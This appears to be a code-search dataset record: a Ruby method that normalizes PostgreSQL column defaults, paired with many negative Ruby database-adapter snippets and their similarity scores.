"def to_cql_literal(value)\n return 'NULL' if value.nil?\n return \"'#{escape_special_chars(value)}'\" if value.is_a?(String)\n return \"'#{value}'\" if value.is_a?(Symbol)\n return \"#{value}\" if value.is_a?(Numeric)\n return \"'#{value.strftime(CQL_TIMESTAMP_FORMAT)}'\" if value.is_a?(Time) || value.is_a?(DateTime)\n #return \"#{value.to_i * 1000}\" if value.is_a?(Time) || value.is_a?(DateTime)\n\n # Set\n if value.is_a?(Set)\n return \"{#{value.map {|v| to_cql_literal(v)}.join(',')}}\"\n end\n\n # Map\n if value.is_a?(Hash)\n keys = value.keys\n return \"{#{keys.map {|k| \"#{to_cql_literal(k)} : #{to_cql_literal(value[k])}\" }.join(',')} }\"\n end\n\n # List\n return \"[#{value.map {|v| to_cql_literal(v)}.join(',')}]\" if value.is_a?(Array)\n\n return nil\n end",
"def same_case( str , options = Hash.new )\n return str.upcase if options[:upcase] || options[:downcase] == false\n str.downcase\nend",
"def normalize_options(options)\n options = options.dup\n OPTION_ALIASES.each do |canonical_name, aliases|\n alias_key = aliases.detect { |key| options.key?(key) }\n options[canonical_name] ||= options[alias_key] if alias_key\n options.except!(*aliases)\n end\n\n options\n end",
"def update_sql(values=OPTS)\n case values\n when LiteralString\n super\n when String\n super(LiteralString.new(values))\n else\n super\n end\n end",
"def literal_string_append(sql, s)\n sql << \"'\" << db.synchronize(@opts[:server]){|c| c.escape(s)} << \"'\"\n end",
"def double_quote(value)\n return if value.nil?\n\n case value.to_s\n # Ignore keys that contain double quotes or a Arel.star (*)[all columns]\n # or if a table has already been explicitly declared (ex: users.id)\n when \"*\", /((^\".+\"$)|(^[[:alpha:]]+\\.[[:alnum:]]+)|\\(.+\\))/\n value\n else\n PG::Connection.quote_ident(value.to_s)\n end\n end",
"def supports_standard_conforming_strings?\n # Temporarily set the client message level above error to prevent unintentional\n # error messages in the logs when working on a PostgreSQL database server that\n # does not support standard conforming strings.\n client_min_messages_old = client_min_messages\n self.client_min_messages = 'panic'\n\n # postgres-pr does not raise an exception when client_min_messages is set higher\n # than error and \"SHOW standard_conforming_strings\" fails, but returns an empty\n # PGresult instead.\n has_support = select('SHOW standard_conforming_strings').to_a[0][0] rescue false\n self.client_min_messages = client_min_messages_old\n has_support\n end"
] |
[
"0.61051226",
"0.5877964",
"0.584784",
"0.5752945",
"0.5641679",
"0.55594814",
"0.553016",
"0.5495804",
"0.5466278",
"0.5410757",
"0.5399953",
"0.538035",
"0.5236631",
"0.51445156",
"0.5142646",
"0.5113955",
"0.51080203",
"0.51070803",
"0.5061387",
"0.50466436",
"0.50328183",
"0.501064",
"0.5007003",
"0.5005226",
"0.50003445",
"0.49407494",
"0.4915936",
"0.49046806",
"0.48757836",
"0.4868759",
"0.4815229",
"0.4815229",
"0.4812917",
"0.48096463",
"0.48093",
"0.4805711",
"0.4783438",
"0.47740808",
"0.47709802",
"0.4753479",
"0.47522488",
"0.4749778",
"0.4717439",
"0.47010738",
"0.46986222",
"0.469134",
"0.4675401",
"0.46591666",
"0.46547684",
"0.46512756",
"0.4650516",
"0.4648173",
"0.4642451",
"0.46401832",
"0.46381888",
"0.463243",
"0.4622268",
"0.4617038",
"0.4615182",
"0.46021062",
"0.45990825",
"0.458955",
"0.45828426",
"0.4570885",
"0.45582145",
"0.45568848",
"0.45497474",
"0.45393288",
"0.4538624",
"0.4538592",
"0.45265034",
"0.45255345",
"0.45188445",
"0.45158985",
"0.4505682",
"0.4505052",
"0.45046413",
"0.45000204",
"0.44944033",
"0.448572",
"0.44808632",
"0.44782475",
"0.44677007",
"0.4467088",
"0.4456633",
"0.44547528",
"0.4447208",
"0.44464573",
"0.4443555",
"0.44427893",
"0.44379783",
"0.44321564",
"0.44229808",
"0.44171798",
"0.44164494",
"0.44097587",
"0.44069904",
"0.43943596",
"0.4391059",
"0.43910164"
] |
0.5957464
|
1
|
Support identity columns, but only use the identity SQL syntax if no default value is given.
|
def column_definition_default_sql(sql, column)
super
if !column[:serial] && !['smallserial', 'serial', 'bigserial'].include?(column[:type].to_s) && !column[:default]
if (identity = column[:identity])
sql << " GENERATED "
sql << (identity == :always ? "ALWAYS" : "BY DEFAULT")
sql << " AS IDENTITY"
elsif (generated = column[:generated_always_as])
sql << " GENERATED ALWAYS AS (#{literal(generated)}) STORED"
end
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @iiTable = get_table_name(sql)\n @iiCol = get_autounique_column(@iiTable)\n @iiEnabled = false\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n @connection.do(enable_identity_insert(@iiTable, true))\n @iiEnabled = true\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n super\n\n exec_query('SELECT @@IDENTITY AS id')\n end",
"def with_identity_insert_enabled(table_name)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def with_identity_insert_enabled(table_name, &block)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def with_identity_insert_enabled(table_name)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def with_identity_insert_enabled(table_name)\n set_identity_insert(table_name, true)\n yield\n ensure\n set_identity_insert(table_name, false)\n end",
"def auto_increment_sql\n AUTO_INCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def column_definition_auto_increment_sql(sql, column)\n sql << \" #{auto_increment_sql}\" if column[:auto_increment]\n end",
"def auto_increment_sql\n AUTOINCREMENT\n end",
"def post_insert(sql, name, pk, id_value, sequence_name)\n if @iiEnabled\n begin\n @connection.do(enable_identity_insert(@iiTable, false))\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned off\"\n end\n end\n end",
"def post_insert(sql, name, pk, id_value, sequence_name)\n if @iiEnabled\n begin\n @connection.do(enable_identity_insert(@iiTable, false))\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned off\"\n end\n end\n end",
"def auto_increment_sql\n 'AUTOINCREMENT'\n end",
"def column_definition_default_sql(sql, column)\n sql << \" DEFAULT #{literal(column[:default])}\" if column.include?(:default)\n end",
"def property_schema_statement(schema)\n statement = super\n statement << ' AUTO_INCREMENT' if supports_serial? && schema[:serial?]\n statement\n end",
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @logger.unknown(\"ODBCAdapter#pre_insert>\") if @trace\n @logger.unknown(\"args=[#{sql}|#{name}|#{pk}|#{id_value}|#{sequence_name}]\") if @trace\n @iiTable = get_table_name(sql)\n @iiCol = get_autounique_column(@iiTable)\n @logger.unknown(\"@iiCol=#{@iiCol}>\") if @trace\n @iiEnabled = false\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n remove_null_sequence_value_from_sql(sql, @iiCol)\n rescue Exception => e\n raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def table\n Identity\n end",
"def table\n Identity\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super unless type == :uuid\n options[:default] = options.fetch(:default, 'uuid_generate_v4()')\n options[:primary_key] = true\n column name, type, options\n end",
"def default_id=(id)\n if @identity_map.has_key? id\n @default_id = id\n else\n raise TypeError.new(\"Default identity must already exist\")\n end\n end",
"def pre_insert(sql, name, pk, id_value, sequence_name)\n @logger.unknown(\"ODBCAdapter#pre_insert>\") if @trace\n @logger.unknown(\"args=[#{sql}|#{name}|#{pk}|#{id_value}|#{sequence_name}]\") if @trace\n @iiTable = get_table_name(sql)\n @logger.unknown(\"@iiTable=#{@iiTable}\") if @trace\n @iiCol = get_autounique_column(@iiTable)\n @logger.unknown(\"@iiCol=#{@iiCol}\") if @trace\n\n if @iiCol != nil\n if query_contains_autounique_col(sql, @iiCol)\n begin\n remove_null_sequence_value_from_sql(sql, @iiCol)\n# rescue Exception => e\n# raise ActiveRecordError, \"IDENTITY_INSERT could not be turned on\"\n end\n end\n end\n end",
"def identity\n :id\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n table = sql.split(\" \", 4)[2]\n super || last_insert_id(table, sequence_name || default_sequence_name(table, pk))\n end",
"def attributes_protected_by_default\n begin\n default = [primary_key, inheritance_column]\n\n if !primary_key.eql?('id')\n default << 'id'\n end\n rescue ActiveRecord::NoDatabaseError\n default = []\n end\n\n return default\n end",
"def load_identity!\n row_size.times do |r|\n column_size.times do |c|\n self[r, c] = (r == c ? 1 : 0)\n end\n end\n self\n end",
"def id_column\n IdMethods::ID_COLUMN\n end",
"def binds_have_identity_column?(binds)\n binds.any? do |column_value|\n column, value = column_value\n SQLServerColumn === column && column.is_identity?\n end\n end",
"def attributes_protected_by_default\n # default = [ self.class.primary_key, self.class.inheritance_column ]\n # default << 'id' unless self.class.primary_key.eql? 'id'\n # default\n []\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n return super if id_value\n pk = pk_from_insert_sql(sql) unless pk\n select_value(\"#{sql} RETURNING #{quote_column_name(pk)}\")\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n return super if id_value\n pk = pk_from_insert_sql(sql) unless pk\n select_value(\"#{sql} RETURNING #{quote_column_name(pk)}\")\n end",
"def insert_statement(model, properties, serial)\n statement = \"\"\n # Check if there is a serial property being set directly\n require_identity_insert = !properties.empty? && properties.any? { |property| property.serial? }\n set_identity_insert(model, statement, true) if require_identity_insert\n statement << super\n set_identity_insert(model, statement, false) if require_identity_insert\n statement\n end",
"def insert_statement(model, properties, identity_field)\n statement = \"INSERT INTO #{quote_name(model.storage_name(name))} \"\n\n if supports_default_values? && properties.empty?\n statement << 'DEFAULT VALUES'\n else\n statement << <<-SQL.compress_lines\n (#{properties.map { |property| quote_name(property.field) }.join(', ')})\n VALUES\n (#{(['?'] * properties.size).join(', ')})\n SQL\n end\n\n if supports_returning? && identity_field\n statement << \" RETURNING #{quote_name(identity_field.field)}\"\n end\n\n statement\n end",
"def identity(options = {})\n self._identity = options\n end",
"def property_schema_statement(schema)\n statement = super\n\n if schema.has_key?(:sequence_name)\n statement << \" DEFAULT nextval('#{schema[:sequence_name]}') NOT NULL\"\n end\n\n statement\n end",
"def default(id = T.unsafe(nil)); end",
"def default_sequence_name(table_name, column = nil)\n pk, seq = pk_and_sequence_for(table_name)\n if column && (pk != column)\n # Is this ever actually called with a non-pk column?\n nil\n else\n seq\n end\n rescue\n nil\n end",
"def insert_sql(sql, name = nil, pri_key = nil, id_value = nil, sequence_name = nil)\n unless pri_key\n table_ref = extract_table_ref_from_insert_sql(sql)\n pri_key = primary_key(table_ref) if table_ref\n end\n\n if pri_key\n select_value(\"#{sql} RETURNING #{quote_column_name(pri_key)}\")\n else\n super\n end\n end",
"def test_mysql_integer_not_null_defaults\n klass = Class.new(ActiveRecord::Base)\n klass.table_name = 'test_integer_not_null_default_zero'\n klass.connection.create_table klass.table_name do |t|\n t.column :zero, :integer, :null => false, :default => 0\n t.column :omit, :integer, :null => false\n end\n\n assert_equal 0, klass.columns_hash['zero'].default\n assert !klass.columns_hash['zero'].null\n # 0 in MySQL 4, nil in 5.\n assert [0, nil].include?(klass.columns_hash['omit'].default)\n assert !klass.columns_hash['omit'].null\n\n assert_raise(ActiveRecord::StatementInvalid) { klass.create! }\n\n assert_nothing_raised do\n instance = klass.create!(:omit => 1)\n assert_equal 0, instance.zero\n assert_equal 1, instance.omit\n end\n ensure\n klass.connection.drop_table(klass.table_name) rescue nil\n end",
"def default_sequence_name(table_name, pk = \"id\")\n nil\n end",
"def primary_key\n @primary_key || 'id'\n end",
"def default_values_clause\n 'VALUES (DEFAULT)'\n end",
"def column_definition_serial(field)\n \"INTEGER PRIMARY KEY AUTOINCREMENT\"\n end",
"def primary_key(table_name)\n 'id' # table.primary_key || 'id'\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def default_column?(col)\n if col == \"id\" || col == \"created_at\" || col == \"updated_at\" then\n return true\n end\n false\n end",
"def column_definition_null_sql(sql, column)\n null = column.fetch(:null, column[:allow_null])\n if null.nil? && !can_add_primary_key_constraint_on_nullable_columns? && column[:primary_key]\n null = false\n end\n\n case null\n when false\n sql << ' NOT NULL'\n when true\n sql << ' NULL'\n end\n end",
"def column_default(key)\n self.class.column_default(key)\n end",
"def insert_default_values_sql\n \"INSERT INTO #{source_list(@opts[:from])} DEFAULT VALUES\"\n end",
"def can_add_primary_key_constraint_on_nullable_columns?\n true\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n execute(sql, name)\n id_value\n end",
"def identity=(value)\n @identity = value\n end",
"def force_primary_key(klass)\n # Automatically add an :oid serializable field if none is\n # defined and no other primary key is defined.\n if klass.primary_key == :oid and !klass.instance_attributes.include?(:oid)\n klass.attr_accessor :oid, Fixnum, :sql => primary_key_type\n end\n end",
"def execute_insert(sql, opts=OPTS)\n execute(sql, opts.merge(:meth=>:autoid))\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def autoincrementing_primary_key\n primary_key\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil)\n # Extract the table from the insert sql. Yuck.\n table = sql.split(\" \", 4)[2].gsub('\"', '')\n\n # Otherwise, insert then grab last_insert_id.\n if insert_id = super\n insert_id\n else\n # If neither pk nor sequence name is given, look them up.\n unless pk || sequence_name\n pk, sequence_name = *pk_and_sequence_for(table)\n end\n\n # If a pk is given, fallback to default sequence name.\n # Don't fetch last insert id for a table without a pk.\n if pk && sequence_name ||= default_sequence_name(table, pk)\n last_insert_id(table, sequence_name)\n end\n end\n end",
"def default\n by_id(default_id)\n end",
"def sql_for_insert(sql, pk, id_value, sequence_name, binds)\n unless pk\n table_ref = extract_table_ref_from_insert_sql(sql)\n pk = primary_key(table_ref) if table_ref\n end\n\n sql = \"#{sql} RETURNING #{quote_column_name(pk)}\" if pk\n\n [sql, binds]\n end",
"def col_names_for_insert\r\n self.class.column_names.delete_if {|col| col == \"id\"}.join(\", \")\r\nend",
"def identity=(v)\n @identity = v\n end",
"def primary_key(value=nil)\n self.primary_key = value unless value.nil?\n \n @primary_key ||= :id\n end",
"def default_sequence_name(table_name, pk = nil) #:nodoc:\n default_pk, default_seq = pk_and_sequence_for(table_name)\n default_seq || \"#{table_name}_#{pk || default_pk || 'id'}_seq\"\n end",
"def insert(sql, name = nil, pk = nil, id_value = nil) end",
"def identity?\n options[:identity]\n end",
"def default_when_null(sql, default)\n \"COALESCE (#{sql}, #{dispatch(default)})\"\n end",
"def primary_key(name, type = :primary_key, **options)\n column(name, type, **options.merge(primary_key: true))\n end",
"def attributes_protected_by_default\n ['id']\n end",
"def supports_primary_key?\n true\n end",
"def primary_key(table_name)\n pk = super\n\n if pk == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n nil\n else\n pk\n end\n end",
"def primary_key(name, type = :primary_key, options = {})\n return super\n end",
"def serial_primary_key_options\n # :nocov:\n auto_increment_key = server_version >= 100002 ? :identity : :serial\n # :nocov:\n {:primary_key => true, auto_increment_key => true, :type=>Integer}\n end",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def belongs_to_identity(assoc, options={})\r\n other_model = assoc.to_s.camelize.constantize\r\n fk = :\"#{other_model.model_name.to_s.underscore}_identity\"\r\n if defined?(@slowly_changing_columns)\r\n @slowly_changing_columns << [fk, other_model.identity_column_definition.last]\r\n @slowly_changing_indices << fk\r\n end\r\n if ActiveRecord::VERSION::MAJOR > 3\r\n belongs_to assoc, ->{ where \"#{other_model.effective_to_column_sql()}=#{END_OF_TIME}\" },\r\n options.reverse_merge(foreign_key: fk, primary_key: IDENTITY_COLUMN)\r\n else\r\n belongs_to assoc, options.reverse_merge(\r\n foreign_key: fk, primary_key: IDENTITY_COLUMN,\r\n conditions: \"#{other_model.effective_to_column_sql()}=#{END_OF_TIME}\"\r\n )\r\n end\r\n define_method :\"#{assoc}_at\" do |date=nil|\r\n other_model.at_date(date).where(IDENTITY_COLUMN=>send(fk)).first\r\n end\r\n end",
"def manually_autoincrement_id\n # no idea why this is necessary\n # ActiveRecord::StatementInvalid: PGError: ERROR: null value in column \"ID\" violates not-null constraint\n self.ID = Presto::Post.recent.first.ID.to_i + 1\n end",
"def primary_key_type\n \"integer PRIMARY KEY\"\n end",
"def default_columns\n#\t\t%w( id case_icf_master_id mother_icf_master_id icf_master_id \n\t\t%w( id case_icf_master_id mother_icf_master_id icf_master_id \n\t\t\tsubject_type vital_status sex dob \n\t\t\tfirst_name last_name)\n\tend",
"def insert(*values)\n if @opts[:returning]\n # Already know which columns to return, let the standard code handle it\n super\n elsif @opts[:sql] || @opts[:disable_insert_returning]\n # Raw SQL used or RETURNING disabled, just use the default behavior\n # and return nil since sequence is not known.\n super\n nil\n else\n # Force the use of RETURNING with the primary key value,\n # unless it has been disabled.\n returning(*insert_pk).insert(*values){|r| return r.values.first}\n end\n end",
"def identity(input, name: nil)\n _op(:identity, input, nil, name: name)\n end",
"def identifier\n id || name || default_identifier\n end",
"def add_no_pk(options={})\n column_names = options.keys\n values = options.values\n\n individual_values = []\n\n values.each do |value|\n if value.is_a?(String)\n individual_values << \"'#{value}'\"\n else\n individual_values << value\n end\n end\n\n column_names_for_sql = column_names.join(\", \")\n individual_values_for_sql = individual_values.join(\", \")\n\n CONNECTION.execute(\"INSERT INTO #{get_table_name} (#{column_names_for_sql}) VALUES (#{individual_values_for_sql});\")\n\n self.new(options)\n end",
"def generate_identity\n handle_name ||= username if respond_to?(:username)\n handle_name ||= short_name if respond_to?(:short_name)\n handle_name ||= name.parameterize(\"_\").gsub(\"-\",\"_\") if respond_to?(:name)\n\n self.handle = Handle.build_unique(self, handle_name)\n self.handle.identifiable = self\n\n self[identity_field] = handle.name\n instance_variable_set(:\"@#{identity_field}\", handle.name)\n end",
"def last_insert_id(conn, opts={})\n nil\n end",
"def last_insert_id(conn, opts={})\n nil\n end",
"def supports_primary_key?\n true\n end",
"def insert_sql(sql, name = nil, pk = nil, id_value = nil, sequence_name = nil, binds = [])\n # Extract the table from the insert sql. Yuck.\n table = sql.split(\" \", 4)[2].gsub('\"', '')\n\n # Try an insert with 'returning id' if available (PG >= 8.2)\n if supports_insert_with_returning? && id_value.nil?\n pk, sequence_name = *pk_and_sequence_for(table) unless pk\n if pk\n sql = substitute_binds(sql, binds)\n id_value = select_value(\"#{sql} RETURNING #{quote_column_name(pk)}\")\n clear_query_cache #FIXME: Why now?\n return id_value\n end\n end\n\n # Otherwise, plain insert\n execute(sql, name, binds)\n\n # Don't need to look up id_value if we already have it.\n # (and can't in case of non-sequence PK)\n unless id_value\n # If neither pk nor sequence name is given, look them up.\n unless pk || sequence_name\n pk, sequence_name = *pk_and_sequence_for(table)\n end\n\n # If a pk is given, fallback to default sequence name.\n # Don't fetch last insert id for a table without a pk.\n if pk && sequence_name ||= default_sequence_name(table, pk)\n id_value = last_insert_id(table, sequence_name)\n end\n end\n id_value\n end",
"def last_insert_id(conn, opts={})\n stmt = conn.createStatement\n begin\n sql = opts[:prepared] ? 'SELECT @@IDENTITY' : 'SELECT SCOPE_IDENTITY()'\n rs = log_yield(sql){stmt.executeQuery(sql)}\n rs.next\n rs.getInt(1)\n ensure\n stmt.close\n end\n end",
"def default?\n @id == :default\n end",
"def last_insert_id(table, sequence_name) #:nodoc:\n identity = select_value(\"SELECT scope_identity()\")\n if identity.class == System::DBNull\n nil\n else\n System::Convert.to_int32(identity)\n end\n end",
"def auto_generate_id\n false\n end",
"def quote_identifiers_default\n true\n end",
"def primary_key\n 'id'\n end",
"def minimum_id(...)\n end",
"def key(*fields)\n self.primary_key = fields\n identity(:type => String)\n set_callback :save, :before, :identify\n end",
"def identity(input, name: nil)\n _op(:identity, input, name: name)\n end",
"def col_names_for_insert\n self.class.column_names.delete_if do |col|\n col == \"id\"\n end.join(\", \")\n end",
"def insert\n col_names = self.class.columns.join(\", \")\n question_marks = ([\"?\"] * self.class.columns.length).join(\", \")\n DBConnection.execute(<<-SQL, *attribute_values)\n INSERT INTO\n #{self.class.table_name} (#{col_names})\n VALUES\n (#{question_marks})\n SQL\n\n self.id = DBConnection.last_insert_row_id\n end",
"def primary_key\n fail NotImplementedError\n end",
"def standard_columns\n pset = %w[id created_at updated_at contactid user_id\n extra_log_type admin_id]\n\n # Only add in the master_id if the master is a foreign key, not a standard integer field\n # so that we treat the field correctly in comparisons of new - old\n pset << 'master_id' if master_fk?\n\n pset += [\"#{table_name.singularize}_table_id\", \"#{table_name.singularize}_id\"]\n pset\n end"
] |
[
"0.6527207",
"0.6237912",
"0.62254494",
"0.619042",
"0.61669624",
"0.61669624",
"0.6040682",
"0.6005519",
"0.6005519",
"0.59868515",
"0.5979152",
"0.59677976",
"0.59677976",
"0.59347665",
"0.58789515",
"0.5854652",
"0.5758402",
"0.57253426",
"0.57253426",
"0.5648476",
"0.5648476",
"0.5626624",
"0.5607997",
"0.5580494",
"0.5569909",
"0.5558238",
"0.549398",
"0.54835343",
"0.5480638",
"0.5467122",
"0.5452428",
"0.5452428",
"0.5365619",
"0.536536",
"0.535894",
"0.53374386",
"0.52618295",
"0.52354085",
"0.5227512",
"0.52235055",
"0.52095294",
"0.51966923",
"0.5180208",
"0.51755196",
"0.5174454",
"0.51414",
"0.5135195",
"0.5127471",
"0.51264447",
"0.5106506",
"0.5102621",
"0.5085302",
"0.50689083",
"0.5057943",
"0.50283444",
"0.50086445",
"0.50086445",
"0.5008336",
"0.50072026",
"0.5003555",
"0.49743232",
"0.4974292",
"0.49719527",
"0.49707398",
"0.4964244",
"0.49323323",
"0.493047",
"0.4909101",
"0.48918772",
"0.48914608",
"0.48891214",
"0.48879498",
"0.48868757",
"0.48832756",
"0.48770767",
"0.4875006",
"0.486934",
"0.48653212",
"0.4857309",
"0.48567265",
"0.48561412",
"0.48508328",
"0.48494753",
"0.48437363",
"0.48437363",
"0.48368785",
"0.4833405",
"0.48304722",
"0.48259306",
"0.48247388",
"0.48246527",
"0.4824445",
"0.48229176",
"0.48194855",
"0.4818885",
"0.4817425",
"0.4815043",
"0.48142847",
"0.48056895",
"0.4803939"
] |
0.6951704
|
0
|
Handle PostgreSQL specific default format.
|
def column_schema_normalize_default(default, type)
if m = /\A(?:B?('.*')::[^']+|\((-?\d+(?:\.\d+)?)\))\z/.match(default)
default = m[1] || m[2]
end
super(default, type)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def default_format=(format)\n @default_format = format\n end",
"def default_format\n @default_format ||= :html\n end",
"def set_default_format\n @default_format=\"pdf\"\n end",
"def set_date_format(format) \n unless format.nil?\n return format\n else\n return @@db_format\n end\n end",
"def formats; end",
"def formats; end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.to_s\n def default.inspect\n \"#{super}.lit\"\n end\n default\n end\n end",
"def column_schema_to_ruby_default_fallback(default, options)\n if default.is_a?(String) && options[:same_db] && use_column_schema_to_ruby_default_fallback?\n default = default.dup\n def default.inspect\n \"Sequel::LiteralString.new(#{super})\"\n end\n default\n end\n end",
"def parse_postgresql_overrides\n Gitlab['patroni']['postgresql'] ||= {}\n POSTGRESQL_DCS_PARAMETERS.each do |key|\n Gitlab['patroni']['postgresql'][key] ||= postgresql_setting(key)\n end\n end",
"def _process_format(format); end",
"def _process_format(format); end",
"def revert_postgres_type( type )\n case type\n when /\\Acharacter varying/\n return :String, :default_size => 255\n when /\\Acharacter/\n return :String, :fixed => true, :default_size => 255\n when /\\Atext\\z/\n return :String, :text => true\n when /\\Abytea\\z/\n return :blob\n when /\\Atimestamp/\n return :timestamp\n end\n end",
"def default\n if @default\n sql = \"SELECT CAST(#{@default} AS #{column_def}) FROM RDB$DATABASE\"\n connection = ActiveRecord::Base.connection\n if connection\n value = connection.select_one(sql)['cast']\n if value.acts_like?(:date) or value.acts_like?(:time)\n nil\n else\n type_cast(value)\n end\n else\n raise ConnectionNotEstablished, \"No Firebird connections established.\"\n end\n end\n end",
"def default_format= format\n @worksheet.add_format format if @worksheet\n @default_format = format\n end",
"def default_format(*value)\n set_format(@entry_format_default, *value)\n end",
"def format\n params.fetch(:format, default_format)\n end",
"def format\n @format ||= self._format_default\n end",
"def default_formats\n attr_formats = {}\n columns.each do |column|\n attr_formats[column.name] = case column.type\n when :integer, :float\n {:class => :right, :formatter => :number_with_delimiter}\n when :text, :string\n {}\n when :date, :datetime\n {}\n else\n {}\n end\n end\n attr_formats\n end",
"def default_format\n @default_format || @worksheet.default_format || @workbook.default_format\n end",
"def target_postgresql_version=(_arg0); end",
"def target_postgresql_version; end",
"def typus_date_format(attribute = :default)\n Typus::Configuration.config[name]['fields']['options']['date_formats'][attribute.to_s].to_sym\n rescue\n :db\n end",
"def adapter_initialize\n @use_iso_date_format = typecast_value_boolean(@opts.fetch(:use_iso_date_format, Postgres.instance_variable_get(:@use_iso_date_format))) # , true)) # SEQUEL5\n initialize_postgres_adapter\n add_conversion_proc(17, method(:unescape_bytea)) if USES_PG\n add_conversion_proc(1082, TYPE_TRANSLATOR.method(:date)) if @use_iso_date_format\n self.convert_infinite_timestamps = @opts[:convert_infinite_timestamps]\n end",
"def default_format\n case input_type\n when :bootstrap_date\n I18n.t('date.formats.default')\n when :bootstrap_date_time\n I18n.t('time.formats.default')\n end\n end",
"def default_options_date_format(format)\n format || '%Y-%m-%d - %l:%M:%S%p'\n end",
"def format\n raise NotImplementedError\n end",
"def set_format_for_row(format)\n @sheet.row(@current_row).default_format = format\n end",
"def pg\n uri = URI.parse( hpg_resolve(shift_argument, \"DATABASE_URL\").url )\n config = {\n 'name' => gen_datasource_name(\"PostgreSQL\"),\n 'type' => \"POSTGRESQL\",\n 'config' => {\n 'host' => uri.host,\n 'port' => uri.port || 5432,\n 'database' => uri.path[1..-1],\n 'username' => uri.user,\n 'password' => uri.password,\n 'use_ssl' => true,\n 'validate_ssl_cert' => false\n }\n }\n open_jackdb(config)\n end",
"def process_postgres(target)\n {\n :schema => 'iglu:com.snowplowanalytics.snowplow.storage/postgresql_config/jsonschema/1-0-0',\n :data => {\n :name => target['name'],\n :host => target['host'],\n :database => target['database'],\n :port => target['port'],\n :sslMode => target['ssl_mode'].upcase,\n :schema => target['table'].split('.')[0],\n :username => target['username'],\n :password => target['password'],\n :purpose => 'ENRICHED_EVENTS'\n }\n }\nend",
"def default_timestamp_format\n \"TIMESTAMP '%Y-%m-%d %H:%M:%S%N %z'\".freeze\n end",
"def determine_and_set_format options\n options.format = @template_format = options.format || @template_format\n end",
"def encoding\n select_value(\"SELECT pg_encoding_to_char(encoding) FROM pg_database WHERE datname LIKE '#{current_database}'\", 'SCHEMA')\n end",
"def set_default_format\n if request.format.symbol.nil? || request.format.to_s == '*/*'\n logger.debug \"[ApplicationController] Request format set to #{request.format.to_s.inspect}, forcing 'text/plain'\"\n request.format = :text\n end\n end",
"def reset_format!\n self.format = @default_format\n end",
"def format\n @format ||= {}\n end",
"def default_format_json\n if(request.headers['HTTP_ACCEPT'].nil? && params[:format].nil?) ||\n (request.headers['HTTP_ACCEPT'] != 'application/xml' && params[:format] != 'xml')\n request.format = 'json'\n end\n end",
"def set_default_format_json\n if params[:format] && params[:format] != 'json'\n head :bad_request\n else\n request.format = 'json' unless params[:format]\n end\n end",
"def odb_format(frmt)\n \"#{to_s}.format(#{quote(frmt)})\"\n end",
"def prepare_column_options(column)\n super.tap do |spec|\n spec[:encoding] = \"'#{column.sql_type_metadata.encoding}'\" if column.sql_type_metadata.encoding.present?\n end\n end",
"def _process_format(format) # :nodoc:\n end",
"def check_acceptable_format\n if [\"txt\", \"png\"].include?(params[:format])\n params[:format] = nil\n raise ActiveRecord::RecordNotFound.new\n end\n end",
"def formats=(values); end",
"def schema_column_type(db_type)\n case db_type\n when /\\Ainterval\\z/io\n :interval\n when /\\Acitext\\z/io\n :string\n else\n super\n end\n end",
"def preferred_file_format\n ''\n end",
"def encoding\n select_value(\n \"SELECT pg_encoding_to_char(pg_database.encoding)\" <<\n \" FROM pg_database\" <<\n \" WHERE pg_database.datname LIKE '#{current_database}'\",\n 'SCHEMA')\n end",
"def index_formats(format)\n end",
"def format\n lookup_val = Integer(@rf['format'])\n @_format ||= format_proxy.lookup_format_name(lookup_val)\n rescue\n @rf['format']\n end",
"def format(format_name)\n valid_for 'string'\n assert_string format_name\n set format: format_name\n end",
"def check_acceptable_format\n raise ActiveRecord::RecordNotFound if [\"txt\", \"png\"].include?(params[:format] )\n end",
"def only_correct_postgres_version\n %w(8.4 9.0 9.1 9.2 9.3 9.4 9.5 9.6).each do |version|\n if version != postgresql_version.to_s # need to_s, because YAML may think it's a float\n package \"postgresql-#{version}\", :ensure => :absent\n package \"postgresql-contrib-#{version}\", :ensure => :absent\n end\n end\n end",
"def format; end",
"def format; end",
"def format; end",
"def format; end",
